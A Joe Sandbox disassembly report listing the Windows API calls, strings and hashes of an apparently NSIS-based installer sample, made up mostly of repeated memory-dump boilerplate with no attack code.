                                                                                                                                                                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(FFFFFFFF,00403AD1,?), ref: 00403864
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b9bdbc8744521ee651ba7bc90111acac5a2c88e2b86e9c74d328a3688b9dc09a
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BC0223810020092E1242F34AE0EB063A04F740330F500B3EF0F2F02F0D73C8640006D
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                                                      • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                                                      • String ID: 82D$@%F$@rD$A
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3347642858-1086125096
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                                                                                                                                                                      • \*.*, xrefs: 00406D03
                                                                                                                                                                                                                                                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                                                                                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                                                                                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2035342205-3294556389
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                                                      • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
